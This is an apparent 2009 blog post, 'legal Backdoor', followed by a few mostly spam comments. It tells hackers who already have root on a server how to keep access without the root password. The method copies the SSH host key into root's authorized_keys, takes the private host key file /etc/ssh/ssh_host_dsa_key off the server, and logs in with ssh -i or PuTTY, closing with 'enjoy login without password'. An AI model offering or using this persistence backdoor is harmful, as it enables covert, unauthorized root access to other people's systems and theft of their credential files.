Thursday, January 29, 2009

legal Backdoor

Some Hackers they gain root privilege on a secure server but they can't install rootkit or backdoor, so what to do?

actually they can login any time to the server without known the root password!!!

by using RSA or DSA private key to login.

On Server Side:
  • copy the public key "/etc/ssh/ " to "~/.ssh/authorized_keys" with chmod 600
#cp /etc/ssh/ ~/.ssh/authorized_keys
#chmod 600 ~/.ssh/authorized_keys

On Client Side:
  • save the private key "/etc/ssh/ssh_host_dsa_key" to your machine with chmod 600
  • use it with SSH option "-i" to login without password.
#chmod 600 ssh_host_dsa_key

#ssh root@ -i ssh_host_dsa_key

For Windows Users:
  • copy the private key "/etc/ssh/ssh_host_dsa_key" content to window notepad
  • load it in puttygen.exe and save it again with .ppk extension
  • select the key from putty>connection>SSH>Auth

and enjoy login without password ;)


  1. تفكير نقي والله الطريق رائعة
    عضو في sec-r1z

  2. freelancing meaning

    Thanks for sharing article nice one..waiting for next one keep it up

  3. The dedicated lawyer will get the response and comments of the relevant lawyer and inform the client within the pre-fixed time.Contabilitate Iasi

  4. The data you have posted is extremely valuable. The locales you have alluded was great. A debt of gratitude is in order for sharing...